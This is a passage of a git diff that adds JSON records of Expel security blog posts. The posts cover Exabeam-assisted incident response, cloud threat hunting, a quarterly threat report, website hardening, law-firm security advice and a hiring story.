user\u2019s web activity stitched into the Exabeam session and identified that the attacker moved staging tools on the VDI directly from Github. Lastly, we saw the actual EDR alerts stitched into the session timeline where the PowerSploit script was blocked from executing by the EDR. Without even looking at the EDR data, we answered all of our investigative questions with relative accuracy through Exabeam\u2019s user session timeline. What did the attacker do on this host? He or she downloaded various post-exploitation tools to escalate privileges, which were blocked from executing by the EDR. Did the attacker move laterally to any other hosts? Given that we have the Windows Event logs stitched into the session, we didn\u2019t see any other access into the environment with this user account. Did the attacker have access to any other accounts? This question is a little trickier to answer because we\u2019re only reviewing a single user session in Exabeam, but we can infer that the attacker was limited to this single account since he or she was isolated to a single provisioned VDI. How did the attacker get into this environment? We quickly discovered authenticated access into the Citrix environment via Netscaler VPN. This would\u2019ve taken analysts hours to identify with manual response scoping through raw data. Visibility into things that didn\u2019t set off alarms in your EDR Identifying everything an attacker did in the timeframe of when the incident occurred is challenging enough for analysts and responders. In the previous example, we mentioned some of the nuances and lengthy processes involved in endpoint incident response. There are potentially millions of endpoint events occurring every day. This is a lot of data for humans to comb through to timeline an incident. What if an incident spans several days, weeks or even months? Here\u2019s an example: Expel responded to an intrusion first detected by an EDR due to an attacker\u2019s deployment of a Cobalt Strike Beacon backdoor. Further analysis of the endpoint revealed the attacker performing reconnaissance of the network and Activity Directory (AD) environment with various open source tools. Reviewing this user\u2019s sessions in Exabeam gave us lots of insightful data. All activity identified through host response from EDR data was validated in the Exabeam timeline: the EDR alert was preceded by various recon activities. Like the previous compromise example, this authorized user had limited network activity and the only previous session occurred 20 days earlier. Interestingly enough, that earlier session revealed the attacker to be active in the environment; he or she was performing the same recon activities. However, because the activities performed by the attacker during this previous session didn\u2019t warrant an accumulated risk score, Exabeam didn\u2019t generate an alert. More specifically, the attacker didn\u2019t execute the Beacon PowerShell activity that originally brought this to Expel\u2019s attention, thus no EDR detection occurred for the earlier session. (More on this momentarily.) Exabeam proved to be highly valuable in identifying attacker dwell time in an environment \u2014 something that might not always be apparent with EDR technology. Keep in mind that EDR data retention is sometimes limited for endpoints and varies, ranging from storing up to a month of data to as little as several hours\u2019 worth depending on the technology. Traditional IOC scoping, especially with compromised VPN/AD credentials, may not reveal an attacker. Putting it all together At the end of the day, Exabeam is still a machine learning (ML) technology. Like any ML technology it requires a little TLC, but if you take the time to tune it, you can get some really incredible benefits from it. Here are a few tricks we\u2019ve learned about Exabeam: 1. Send the right data to Exabeam. Windows Event Logs, authentication logs (all of them!), web gateway logs and security events (EDR, AV, NSM, etc.) are a great start. Pro tip: anomaly detection of Windows process execution (Windows Event 4688) by users is awesome! Exabeam provides hundreds of data parsers natively to consume just about any data that\u2019s thrown at it. 2. Modify the rule risk scoring based on your organization\u2019s risk posture. The default risk scoring isn\u2019t a one-size-fits-all approach to measuring risk in an organization. Is insider data theft your org\u2019s biggest concern? Give those rules a risk score increase. The process execution example below is one I\u2019d personally opt to boost. 3. Don\u2019t introduce new, high-volume data sets too quickly that greatly impact the data models (especially web gateway logs). Exabeam guides customers to allow the system learn on its own for a period of 45 days before enabling the rule set and leveraging it as a production tool. When you add a bunch of new data to an existing model, all of that new data becomes an anomaly. And you don\u2019t necessarily want that. If you find yourself in this position, pull back the risk scoring for those affected rules down to zero until the data models are able to catch up (or consult with your Exabeam partner for help). And here are some other points to consider if you\u2019re thinking of investing in a tool like Exabeam: 1. EDR isn\u2019t going to catch everything, particularly the anomalous use of credentials. Anomaly detection platforms like Exabeam can excel in this department. Keep in mind that UEBA platforms do require a certain amount of supervision to keep the false positives at bay, but you\u2019ll have a better chance of surfacing up something that your traditional security tools might not catch. 2. Incident response is time consuming. There\u2019s a lot of data to sift through to paint the full picture of what happened after an incident occurs. UEBA platforms like Exabeam do a rad job of helping stitch all of that user or entity context together to provide you with a comprehensive timeline of attacker activity." +} \ No newline at end of file diff --git a/expel-hunting-now-in-the-cloud.json b/expel-hunting-now-in-the-cloud.json new file mode 100644 index 0000000000000000000000000000000000000000..aa99beeb27f7c390fdf43e88c012aa3fa234c13b --- /dev/null +++ b/expel-hunting-now-in-the-cloud.json @@ -0,0 +1,6 @@ +{ + "title": "Expel Hunting: Now in the cloud", + "url": "https://expel.com/blog/expel-hunting-now-in-the-cloud/", + "date": "May 11, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Expel Hunting: Now in the cloud Security operations \u00b7 3 MIN READ \u00b7 PETER SILBERMAN \u00b7 MAY 11, 2021 \u00b7 TAGS: Cloud security / Company news / Hunting / MDR / Tech tools Great security strategy is made up of a multi-layered approach. It involves, but isn\u2019t limited to, detecting suspicious activity in real time, using proactive security controls and policies \u2013 and if you have the time (try not to laugh too hard here) \u2013 actively looking (or hunting) for threats. Hunting has traditionally looked for spots where an attacker slipped through without setting off alarm bells. But with the current tech transformation \u2013 adoption of SaaS, use of cloud infrastructure, introduction of new (and amazing) services to make developers and users more efficient \u2013 we think it\u2019s time to expand on what hunting can find. Hunting gives you visibility into interesting things happening in your environment \u2013 like users modifying configurations or adding applications that can decrease your security posture along with activity that can indicate process breakdowns or genuinely suspicious activity. We think of these findings as insights. And these insights help our customers truly understand their environment and can keep bad stuff from happening. With more and more orgs using multiple cloud providers to store all the things, hunting (and the insights it produces) is an important part of any security strategy. Which is why we\u2019re introducing new hunting techniques for our customers that focus on \u2013 you guessed it \u2013 cloud. What\u2019s new Expel Hunting now offers coverage in Amazon Web Services (AWS) and Microsoft Azure to help find blind spots. We\u2019re newly armed with a set of targeted cloud hunts, focused on key pieces of information you may be missing. Transparency \u2013 We lay our cards on the table so you know exactly what we\u2019re doing for you. For every hunt, we\u2019ll show you the work that went into it. We\u2019ll tell you our methodology \u2013 mapped back to the MITRE ATT&CK framework, the data we pulled, what tech we used and the outcomes. It\u2019s important for you to see what we\u2019re doing and why \u2013 so you can learn too. Expanded scope \u2013 We\u2019re constantly adding to our library of hunt techniques based on activity we see among our clients. Which is why we\u2019ve added new hunts focused on cloud environments and applications. Insights \u2013 While we\u2019re running through your logs, we\u2019ll tell you what normal looks like for you and surface activity that something does not seem right. These findings provide visibility into your environment that you didn\u2019t know about otherwise. You can put these insights into action and better secure your environment. What you\u2019ll get with Expel Hunting More value out of your existing tech No need to go out and buy more stuff. We\u2019ll hunt across your environment with the tools you\u2019ve already invested in. The more we connect to, the more we can hunt for. Breaking down these silos helps make your team and existing investments stronger. Uncover more than threats We hunt beyond what is malicious. As we comb through your data, we flag strange activity that falls outside of \u201cnormal\u201d like misconfigurations in your infrastructure that could be increasing your cloud costs. With expanded insight into your environment, you\u2019ll get an in-depth analysis of your logs and shine light on anomalous activity that would not be found through detection. Hunt techniques aligned to your unique risks Do you want to hunt in the cloud, in SaaS apps or on-prem? You got it. We take a close look at your environment and let you know exactly what hunting techniques we can use and the types of things we\u2019re able to find. More sleep Don\u2019t lose sleep after reading the latest Reddit article that leaves you wondering: How do I know we\u2019re not affected? By working with Expel, you\u2019ll have more confidence when the latest threat strikes, knowing that we\u2019re protecting you against emerging threats and improving your security posture. (We can\u2019t, however, help with sleep problems related to noisy neighbors, pets, children with an inexplicable abundance of energy \u2026 you get the idea.) Ready to go on the hunt? We sure are. If you\u2019re curious as to what others think about Expel Hunting, take a look at the Q1 2021 Forrester Wave\u2122 Report , where Expel was ranked five out of five when it comes to threat hunting. Let us help so that your team can get back to focusing on the highest value security work \u2013 and get you back to doing what you love. Learn more about Expel Hunting" +} \ No newline at end of file diff --git a/expel-quarterly-threat-report-q3-top-5-takeaways.json b/expel-quarterly-threat-report-q3-top-5-takeaways.json new file mode 100644 index 0000000000000000000000000000000000000000..227e00deeb5ea494fe4e9eaf196ba15bebaeee1b --- /dev/null +++ b/expel-quarterly-threat-report-q3-top-5-takeaways.json @@ -0,0 +1,6 @@ +{ + "title": "Expel Quarterly Threat Report Q3: Top 5 takeaways", + "url": "https://expel.com/blog/expel-quarterly-threat-report-q3-top-5-takeaways/", + "date": "Nov 16, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Expel Quarterly Threat Report Q3: Top 5 takeaways Security operations \u00b7 3 MIN READ \u00b7 BEN BRIGIDA \u00b7 NOV 16, 2022 \u00b7 TAGS: Cloud security / MDR / Tech tools Hi, and welcome\u2013it\u2019s Quarterly Threat Report (QTR) time. Our security operations center (SOC) sees hundreds of alerts each day, and the QTR series (this is the third installment) provides data and insight on what they are, how they work, how to spot them, what to do if you find them, as well as advice you can use to safeguard your organization. The findings draw on our investigations into alerts, email submissions, and threat hunting leads from July 1 to September 30, 2022. We analyzed incidents across our customer base, spanning organizations of various shapes, sizes, and industries, and in the process, we distilled patterns and trends to help guide strategic decision-making and operational processes for your team. We employed a combination of time series analysis, statistics, customer input, and analyst instinct to identify key insights. Our goal: by sharing how attackers got in (or tried to) and how we stopped them, we\u2019ll translate our experiences into security strategies your organization can put into play today . Here are our top findings for the quarter. 1: Identity is still the new endpoint , and it shows no signs of slowing down. Identity-based attacks, which include credential theft, credential abuse, and long-term access key theft, accounted for nearly 60% of all incidents our SOC fielded in Q3. This is up three percentage points compared to Q2. Business email compromise (BEC\u2013unauthorized access into email apps) and business application compromise (BAC\u2013unauthorized access into application data) combined for 55% of all incidents, an increase of four percentage points from Q2. Identity-based attacks in popular cloud environments like Amazon Web Services (AWS) decreased slightly (by two percentage points, for 3% of the total). An interesting data point: 100% of BEC incidents occurred in Microsoft 365 (formerly Office 365) for the second quarter in a row. (We\u2019re pretty sure this is the result of attackers preparing for Microsoft\u2019s long-awaited disabling of Basic Auth for Exchange Online , which went into effect on October 1.) 2: Users increasingly let attackers in by approving fraudulent MFA pushes for BAC. Only about half the BAC incidents our SOC encountered resulted in the attacker successfully accessing the account. The other half was stopped by multi-factor authentication (MFA) or conditional access policies. The frustrating part is that MFA and conditional access were configured for more than 80% of the cases where the attackers were successful . Ideally, none of these hacks should have succeeded. However, the attacker tricked legitimate users into satisfying the MFA request by hitting them with a barrage of MFA requests, and eventually they accepted one. This number is up dramatically from last quarter, when only 14% of successful compromises came from repeated push notifications. The takeaway? To stop MFA push notification fatigue attacks, organizations can disable them in favor of a PIN of a Fast Identity Online (FIDO) compliant solution. If that\u2019s unrealistic, control push notifications using number matching\u2014a setting that requires the user to enter numbers from the identity platform into their MFA app to approve the authentication request. 3: Attackers use IPs geolocated in the U.S. when targeting U.S.-based organizations. If you\u2019re in the U.S. and think you only need to closely monitor for IPs outside the country attempting to access your environment\u2026here\u2019s your wake-up call. Almost half of the BEC attempts and successful BEC compromises we see originate from U.S.-based IP addresses. Also, all the authentication attempts originating from the U.S. came from an IP associated with a VPN or hosting provider. This tactic increases a hacker\u2019s chances of bypassing conditional access policies for source countries that either force the user into an MFA challenge or even flat out block the login. If attackers gain access to the account by harvesting user credentials instead of brute force or another method, they can also harvest the user\u2019s IP (and therefore geolocation). For authentications, it\u2019s vital to have alerting based on the IP organization as well as VPN enrichment services. 4: Ransomware threat groups and their affiliates have abandoned visual basic for application (VBA) macros and Excel 4.0 macros in favor of zipped Javascript or ISO files to infiltrate Windows-based environments. The top attack vectors used by ransomware groups to gain initial entry in Q3 were: Zipped JavaScript files (46% all pre-ransomware incidents) Zipped ISO files (26%) Removable media (10%) Excel 4.0 macros (8%) In Q2, our SOC noted the trend of threat actors using zipped JavaScript and ISO files to deliver malware to gain initial access. Way back in Q1 ( when Microsoft announced its plans to disable Excel 4.0 macros by default in Q3 ), a macro-enabled Microsoft Word document (VBA macro) or Excel 4.0 macro was the initial attack vector in 55% of all pre-ransomware incidents. 5: The top subject line theme for malicious emails was\u2026no subject line at all (followed by \u201cInvoice,\u201d \u201cOrder confirmation,\u201d \u201cPayment,\u201d and \u201cRequest\u201d). Sneaky, cheeky hackers. While the specific wording may change, our data shows that threat actors love a good theme when it comes to subject lines. The top malicious theme? No subject line. Nada. Blank. The rest are what you\u2019d expect\u2014invoice, order, payment, urgent, etc. These high spots are just what a foodie would call an \u201c amuse-bouche. \u201d There\u2019s so much more (including a fun mystery that we\u2019re working to unravel), and odds are pretty good the full QTR offers some insights and advice your team can make use of. Download yours here , and if you have questions or comments, drop us a line ." +} \ No newline at end of file diff --git a/five-quick-checks-to-prevent-attackers-from-weaponizing.json b/five-quick-checks-to-prevent-attackers-from-weaponizing.json new file mode 100644 index 0000000000000000000000000000000000000000..63babf82ba7ff1941070c99b6685a157442cb25d --- /dev/null +++ b/five-quick-checks-to-prevent-attackers-from-weaponizing.json @@ -0,0 +1,6 @@ +{ + "title": "Five quick checks to prevent attackers from weaponizing ...", + "url": "https://expel.com/blog/prevent-attackers-from-weaponizing-website/", + "date": "Aug 22, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG Five quick checks to prevent attackers from weaponizing your website Tips \u00b7 4 MIN READ \u00b7 BRUCE POTTER \u00b7 AUG 22, 2018 \u00b7 TAGS: Get technical / Heads up / How to / Overview / Vulnerability If you work in security, chances are good you got an email from someone Monday (August 20, 2018) asking if your organization was \u201csafe\u201d from the attacks that Microsoft announced by the Russian threat group APT28 (also called Fancy Bear). Microsoft and other large infrastructure providers are in a unique position to see potentially malicious activity and determine not just the target, but the source of the attack as well. In this case, they\u2019ve identified yet another attack from APT28, an organization with a history of interfering with the U.S. democratic process. And beyond simply announcing these attacks and the takedown of the malicious websites, Microsoft is also rolling out a program \u201cfree of charge to candidates, campaigns and related political institutions using Office 365.\u201d But if you\u2019re not a candidate, campaign or related political institution, what\u2019s your takeaway from this announcement? What would they want with your website? You may be thinking \u201cwe aren\u2019t a target for nation-state actors.\u201d While that\u2019s true for many, there are lots of different types of attackers that may be very interested in your website. Here are some of the most frequent ways attackers can use your website and your web presence to harm your company, your users and the public at large. Serving up malware: By embedding malware into an existing website, attackers trade in on the trust you\u2019ve built with your users to compromise their machines. The embedded malware then executes \u201cdrive-by\u201d attacks on your users that can significantly damage your brand and impact a large number of people. A Chinese hacker group did this to target specific individuals registering for a foreign trade lobbying group ahead of a China-US presidential summit. Spoofing your website: Attackers can create websites with addresses similar to yours. They use confusingly named or similar domain names to the websites you already own. By tricking users to go to these fake sites, attackers can harvest credentials and plant malware to gain access to the users\u2019 systems. For example, in this recent Microsoft announcement, the domain \u201cmy-iri.org\u201d was meant to imitate the International Republican Institute located at the domain \u201ciri.org.\u201d Getting into your infrastructure: Best practice is to keep your external website separate from your infrastructure. But that\u2019s not always practical. If your website is connected to other parts of your network, an attack against your website can serve as a gateway for attackers to move further into your enterprise. Denial of service: Your website is your primary face to your customers. It\u2019s also the place where angry customers can express their dissatisfaction. Hopefully, unsatisfied customers will stick to filling out a web form to lodge their complaint. But if they\u2019re bored and skilled, occasionally they\u2019ll take it to the next level and launch a denial of service attack to take your whole web presence offline. The size and scope of DoS attacks have increased dramatically in size over the last year , according to Arbor. Defacement: Once a common activity on the Internet, defacements have waned over the years. But hacktivists and others threat actors still target websites to gain control and change content to promote their ideology. Defacements are often crude, but they can still be jarring to your users and impact your company\u2019s reputation. Five things you can do Managing cyber risk is a balancing act of cost versus risk, and your specific situation will be unique to your own organization. But there are some general truisms when it comes to securing your web presence and we\u2019ve pulled together five recommendations that should apply to most organizations. Two factor everywhere: In general, you should use two-factor authentication (2FA) anywhere possible. But, in particular, when it\u2019s your website, you should enable 2FA for administrators to limit the impact of compromised passwords. Many content management systems (CMS) don\u2019t have 2FA support natively. However, there are plugins for every major CMS that enable 2FA support with common one-time password solutions. Don\u2019t run your own website: Really, running a website is a lot of work. Maintaining the operating system, staying current on the content management system, staying current on best configurations and practices and monitoring for various attacks is more effort than many companies are willing to put into their website. The good news is that you can pay others to run websites for relatively cheap, sometimes even free depending on what your requirements are. If you\u2019re running your website today, consider outsourcing it as soon as possible. Monitor for look-alike domains: Your website only has one correct spelling. Your users, however, don\u2019t really pay that much attention, and there are many misspellings and deceptively named domains that may trick them into visiting a malicious site. There are lots of services that you can use to monitor potentially malicious domain registrations so you can work with registrars to take down infringing domains and warn your users. Patch and audit: If you do run your own website, you\u2019ve got to stay current on patches. Modern CMS\u2019s make patching easy. Usually it just takes the push of a button. That\u2019s super important because attackers can weaponize published vulnerabilities in CMS\u2019s in a matter of hours. It\u2019s important that you patch as soon as possible and audit administrative access logs for suspicious activity. Limit plugins: Historically, CMS\u2019s have been a disaster from a security perspective. However, due to the risk they represent to websites, most CMS\u2019s have really stepped up their game and are relatively secure. The weak link is now the plugins that users install to add functionality. Be sure to vet your plugins before you install them. Some have been well written and audited; others are sort of \u201cfly by night\u201d and have little to no support or documentation. Often, hosted CMS providers have a list of acceptable plug-ins. These lists are usually a good starting point to pick which ones you want to use. Conclusion So \u2026 back to that \u201care we safe\u201d email that higher-ups love to send after every headline. The guidance above should help you explain how and why attackers compromise websites and what you can do to prevent it. But once the latest headline passes, I\u2019d recommend using something like the NIST Cybersecurity Framework to explain your broader security strategy to execs. Once you school them on it, you\u2019ll find it\u2019s an invaluable tool that you can point to when the next headline hits about the risk they are consciously (or unwittingly) accepting based on the security investments they\u2019ve approved." +} \ No newline at end of file diff --git a/five-things-law-firms-can-do-now-to-improve-their-security.json b/five-things-law-firms-can-do-now-to-improve-their-security.json new file mode 100644 index 0000000000000000000000000000000000000000..e53e3ca41b2f4267abe730e0c571f4603bbc491c --- /dev/null +++ b/five-things-law-firms-can-do-now-to-improve-their-security.json @@ -0,0 +1,6 @@ +{ + "title": "Five things law firms can do now to improve their security ...", + "url": "https://expel.com/blog/5-things-law-firms-can-do-now-improve-security-tomorrow/", + "date": "Sep 5, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Five things law firms can do now to improve their security for tomorrow Security operations \u00b7 6 MIN READ \u00b7 AMANDA FENNELL \u00b7 SEP 5, 2019 \u00b7 TAGS: CISO / How to / Managed security / Planning Amanda Fennell is the Chief Security Officer at Relativity, the global legal technology company whose software platform is used by thousands of organizations around the world to manage large volumes of data and quickly identify key issues during litigation, internal investigations and compliance projects. Relativity has 180,000+ active users and works with 198 of the AM Law 200. Its SaaS platform, RelativityOne, is the fastest-growing product in company history. I joined Relativity in January 2018 and it took battling a blizzard in Chicago to walk through the doors that day. Similarly, the weather in the security landscape hasn\u2019t let up in the past year and a half. Larger organizations receive a lot of direction and attention to navigate these cyber storms, but it can be difficult for organizations without a lot of data \u2014 or the right connections \u2014 to clear frameworks like PCI or HIPAA. Legal services organizations, including law firms, are a big part of our user community and we know that this industry needs and is demanding more guidance, info and standards on protecting client data. I\u2019m often asked about how legal services organizations and law firms approach security and if it\u2019s different from the other industries I\u2019ve worked in, or managed the security for, throughout my career. Security hasn\u2019t always been at the forefront for legal services companies and law firms. But the legal services industry presents a softer target for many adversaries, and the data loss from a successful intrusion can lead to stolen intellectual property, merger and acquisition details or even direct financial manipulation. Financial gain is still the major motivation in cyber attacks, with the exception of a few industries \u2014 meaning that the legal services industry will always be on the target list. Developing a mature security program is often a very expensive venture for small to medium-sized firms but I\u2019ve met many forward-thinking security leaders in the industry who\u2019ve been able to make some swift and lengthy strides in protecting their clients\u2019 data. Here are five specific things that orgs in the legal industry can do right now to create immediate, measurable security benefits. #1 \u2013 Perform a risk assessment One thing I\u2019ve observed is that firms that have more mature security approaches also tend to have a better understanding of the risks they face. If you\u2019re proactive about security, you\u2019ll be a pace setter amongst your peers. No matter your org\u2019s size, conducting a risk assessment is a critical first step \u2013 whether you do it in house or hire an external firm. It may be intimidating, particularly if you haven\u2019t previously done a risk assessment, but making even relatively minor changes in organizational or employee behavior can shrink some of your largest risks. In order to fully understand where gaps exist, it\u2019s necessary to assess your current level of risk. You\u2019ll also find a more positive reception from the partners in your firm when you turn security into a risk-based discussion versus a cost-based discussion since they help clients manage risk every single day. #2 \u2013 Vet your partners Law firms rely heavily on third-party partners and vendors \u2014 and they place a lot of trust in these other companies. As we learned from the Target breach in 2013 , trusting vendors implicitly without doing your due diligence can have disastrous results. Attackers target law firms to get access to their clients\u2019 data and they target the vendors used by law firms to exploit that relationship and bypass more difficult routes of compromise. It\u2019s essential that you vet partners and vendors to ensure their security meets your own standards and requirements. Supply chain attacks are often a very successful attack vector against orgs with a shortage of security talent \u2014 which brings me back to knowing what\u2019s at risk in your org and where you should focus your efforts. The vetting process typically begins with checking compliance certifications such as the ISO 27000 standards and SOC 2-Type 2, along with industry-specific certifications such as HIPAA, PCI, and others as applicable. For your closest and most important partners, you should have frank conversations with them about how you both view security. Do you have alignment and the same expectations? Do you share the same vision? Have you established mutual trust? Frequently ensuring your partners and vendors are doing security correctly is overlooked. It is important to ensure that you don\u2019t allow your most trusted allies to become your greatest source of risk. #3 \u2013 Embrace the human element (aka phishing) The most common attack vector is still phishing. The legal industry is no different in that this method is highly effective and can lead to devastating results. The good news is that with some education, training and good tech, your firm can successfully mitigate this threat. Teaching your employees to recognize a phishing email and what steps to take when they receive one is an easy and effective place to start. At Relativity we host regular phishing simulations to train our employees to identify phishing emails and the results have been very rewarding. In looking at our initial phishing email campaign and comparing it to the most recent simulation, we saw a drop of 40% in terms of employees taking incorrect actions. We treat each Relativian as a cyber warrior in the battle to protect our and our customers\u2019 data. Humans have the ability to be our greatest strength against phishing or social engineering attempts, rather than a weak link in the chain \u2014 but it\u2019s our job as security professionals to inspire and educate them. #4 \u2013 Pay attention to what\u2019s happening to other firms Once you\u2019ve identified your largest risks and then start addressing the basics, it\u2019s time to think more proactively about how you can stay ahead of emerging threats. One method of accomplishing this is to pay attention to what\u2019s happening at other firms from a security perspective. Read law trades about incidents at other firms, talk to your peers, attend industry events like ILTACON or Relativity Fest and participate in the Legal Services Information Sharing Organization (LS-ISAO) . There\u2019s nothing more useful in security than the human connections we make with others who are struggling with similar issues or concerns. Organizations and firms represent a spectrum of security maturity at these events. Attendees find not only how others have resolved concerns that are similar to their own, but also how to stay ahead of the threats that are most commonly targeted at the legal services industry. Attacks are growing exponentially and everyone is suffering \u2014 which is why we developed our threat intelligence feed that\u2019s focused on the legal services industry for our RelativityOne customers. We collect and correlate data from our honey networks and from all the customers we work with \u2014 then we anonymize it and make it true threat intelligence that we share. This provides our customers with an industry-wide look at threats relevant to firms or organizations just like their own. This allows even small and medium-sized orgs and firms to take advantage of up-to-date, real-time, actionable threat intelligence to strengthen their security posture. Focusing on where your blind spots are is key to preventing a potential breach. What might appear to be random scanning from one log can be correlated to other activity and may identify behaviors of an advanced persistent threat (APT) actor attempting to compromise a law firm through a remote desktop viewer (yes, this actually happened). #5 \u2013 Bake security into everything you do As the adage goes, \u201csecurity isn\u2019t something you buy, it\u2019s something you do.\u201d Improving your security posture is a process that will take time. When security is a priority, you\u2019ll see security advocates getting a seat at the table for important business discussions and decisions. Partners want the security team to weigh in and green light their decisions. Security is about managing risk. Another sign of security maturity is seeing security baked into many processes such as the Secure Software Development Lifecycle (SDLC). The security team \u2014 or lead partner who manages security \u2014 should be consulted for security impact assessments, vendor reviews, major decisions in engineering, every project that is going to affect the code and many other business decisions that need to be made. Security is everyone\u2019s responsibility A few years ago during a keynote address at Relativity Fest London, our founder Andrew Sieja said something I\u2019ll never forget: \u201cIt\u2019s an honor and a privilege to be a part of the legal profession \u2013 and that\u2019s something every lawyer feels.\u201d That stuck with me because it highlights the great responsibility we have to all our clients using the Relativity platform and RelativityOne, our secure SaaS platform hosted in the Microsoft Azure cloud. We\u2019re helping them do important work and part of that partnership means keeping their information and their clients\u2019 information secure through our work in the Calder7 security group and our company-wide commitment to building a culture of security. Hopefully some of these tips will help you improve your security posture. If, on the flip side, you\u2019re looking at these five tips and saying, \u201cI\u2019ve already done that,\u201d then help others. Speak at conferences, publish whitepapers or collaborate on a blog post with a partner. We love quoting Winston Churchill in Calder7: \u201cOur fight is hard. It will also be long \u2026 but win or lose, we must do our duty.\u201d" +} \ No newline at end of file diff --git a/five-things-that-ll-help-you-determine-whether-you-ll-like.json b/five-things-that-ll-help-you-determine-whether-you-ll-like.json new file mode 100644 index 0000000000000000000000000000000000000000..87a8eadfcea6112ece9273664ab0ee5b438dc18e --- /dev/null +++ b/five-things-that-ll-help-you-determine-whether-you-ll-like.json @@ -0,0 +1,6 @@ +{ + "title": "Five things that'll help you determine whether you'll like ...", + "url": "https://expel.com/blog/five-things-help-determine-like-working-at-company/", + "date": "Nov 12, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Five things that\u2019ll help you determine whether you\u2019ll like working at a company Talent \u00b7 6 MIN READ \u00b7 JEREMY FURNISS \u00b7 NOV 12, 2019 \u00b7 TAGS: Employee retention / Great place to work / Hiring \u201cGrowth only happens when you are uncomfortable.\u201d My wife and I say this to our kids all the time. But here\u2019s the funny thing: For all the advice I give to my children on a regular basis, there are moments when as a parent you have to live the advice you give and lead by example. Earlier this year, I found myself at a crossroads in my career. After spending time working in industries for which I had very little innate passion (even though I was \u201csuccessful\u201d selling in this space), I had to figure out if I wanted to stay the course or try something new. Sure, I could continue doing what I was doing, but would that really bring me career satisfaction for the next 15 years? The biggest challenge I was wrestling with is that I stopped believing that the products I was selling were truly making an impact. I could have continued down the path I was on, selling software solutions to the people and companies I already knew, or I could enter into the field of cybersecurity and try something new in an industry that I\u2019d always wanted to explore. Inherently I always had an inclination that I wanted to be a good guy who stopped bad guys \u2014 I was always drawn to traditional law enforcement. But many years ago I decided that wasn\u2019t the path for me and that I preferred working in computer software \u2026 so a job in cybersecurity made sense. So when a friend of mine encouraged me to take a look at Expel \u2014 a company he thought might be a great fit for me \u2014 I was excited. But I pushed off applying for weeks because I assumed they would have no interest in someone who didn\u2019t \u201cgrow up\u201d speaking cybersecurity. However, the more research I did about Expel, the more it occurred to me that they just might value the fact that I\u2019d bring a different perspective and set of skills with me to the company. So I submitted my resume and landed an interview. And while Expel was interviewing me, I interviewed them as well \u2014 making sure the company was truly a place I\u2019d want to work. Was this a place where I\u2019d fit in? Where I\u2019d get the support I needed? Could I envision myself being there for years to come? Here are five key things I looked for during my interview process to help me figure out the answers to all those questions and more. Sense of humor It all started with the job description. (If you\u2019ve never seen an Expel job posting, you can check some out right here .) After working for years in an industry rife with buzzwords, it was refreshing to find a company that doesn\u2019t take itself too seriously. The employees I met at Expel were no different. They were whip-smart and hard-working, but they also knew when to crack a joke and relax. When you see an Austin Powers movie poster on the wall, you know you\u2019re not in a traditional, stuffy office environment. As I walked through the office for the first time, I also noticed the meeting rooms had funny names \u2014 Pick Your Brain, Out of the Box, and Let\u2019s Unpack This, to name a few \u2014 because the team likes to poke fun at (and avoid using) business buzzwords and industry jargon. Even in the absence of clever conference room names, you can still figure out by looking around an office if they employees are stressed out and chained to their desks, or if they\u2019re relaxed and happy about coming to work. Take notice and think about whether it looks like an environment you\u2019d want to work in. Genuine respect for employees (and people in general) On Expel\u2019s Careers page , the first sentence says it all: \u201cAt Expel, we believe if we take care of our employees, they will take care of our customers, and the rest will work itself out.\u201d Many companies say they care about their employees, but those claims quickly unravel when it\u2019s time to demonstrate that care and respect. Most companies view employees as interchangeable cogs in their revenue machine \u2014 thinking of them more as \u201chuman resources\u201d instead of people. But the reality is that customers buy from people they like and trust. Which means that the people (and how a company treats them) matter a lot. Being passionate about your company and the problems their products solve comes through loud and clear in the sales process. A customer can tell if you personally believe in the company and the solution or not. A customer can also tell if an employee is happy . During your interview process, think about what makes you happy at work. Beyond a great product or solution that you believe in, what else do you need personally to succeed? Ask about those things during your interviews. A no-BS attitude toward selling The simplicity of the sales process at Expel really appealed to me. This line from the job description is completely accurate: \u201cMaybe they need your thing, maybe they don\u2019t, but they trust you and you\u2019ll get 30 minutes to see if there\u2019s a fit.\u201d Now that I\u2019m part of the Expel team, I can tell you that the discussions we have with potential customers are so refreshing. There\u2019s clean and concise dialogue. There\u2019s collaboration. There\u2019s a real desire to solve a problem and help a customer. I like that Expel takes all the old school, annoying sales tactics \u2014 the long PowerPoint presentations, the long lunches, the finger pistols \u2014 out of the sales process. As I think about how Expel\u2019s sales process differs from others that I\u2019ve experienced, I always wonder, \u201cWhy doesn\u2019t everyone do business this way?\u201d Dive deep with your interviewers to figure out what the sales process really looks like. Ask for real-life examples of engagements with prospects. Culture of transparency Expel doesn\u2019t just talk about culture and transparency. The company puts it into practice. From my first phone interview to the moment I walked into the office in Herndon as a full-time hire, the culture permeates the environment. The people are genuine. Everyone is inherently driven by the success of the company versus personal success. In most sales teams the environment is typically one full of selfish motives and attitudes, especially when a new rep joins the team and takes a piece of someone else\u2019s pie. But from day one, my colleagues at Expel have been my coaches and advocates to accelerate my path to success, including me in calls with prospects and sharing their resources and tips that have helped them along the way. Will your new company help you get up to speed and share their lessons learned so that you can be successful? Or do they take an \u201cevery (wo)man for herself\u201d approach to sales? Ongoing support and encouragement The hiring process reminded me of one of my favorite books: \u201cGood to Great\u201d by Jim Collins . For the culture to scale as we continue to grow, we have to get the right people on the bus \u2014 and that doesn\u2019t necessarily mean people with the \u201cright\u201d industry knowledge. Sure, that\u2019s helpful, but there are certain traits we look for here at Expel that can\u2019t easily be taught. The leadership team knew I didn\u2019t have a cybersecurity background but they were committed to teaching me about the industry. The team gave me access to online training modules for security novices, which were so valuable in expediting my onboarding timeline. Key leaders within our company gave me their time as part of a sales enablement program which laid out the roadmap for success. Make sure to ask about what kind of support you have. What does that support look like, and who\u2019s it coming from? One month later \u2026 After starting with Expel one month ago, it\u2019s exceeded my expectations. Prior to my first day, an amazing welcome box showed up on my doorstep (I\u2019m a remote employee), which I shared in this post . From that day forward, the journey\u2019s been exciting for our entire family. Our four kids have asked questions, watched cybersecurity tutorial videos, and more \u2014 and now my youngest says that Expel is like \u201cBatman for the computer.\u201d They\u2019re now more interested in understanding what their Daddy does every day, which they\u2019ve never taken much interest in before. As a working parent, one thing I hope to model for my children is how to be not just content with but energized by your work. By carefully contemplating my next career move, asking lots of questions and finding a company with a culture that felt very \u201cme,\u201d I get to show them what that great energy looks like every day. They\u2019ve seen firsthand how stepping outside my comfort zone has blessed us to be a part of an amazing opportunity to change the market for managed security providers." +} \ No newline at 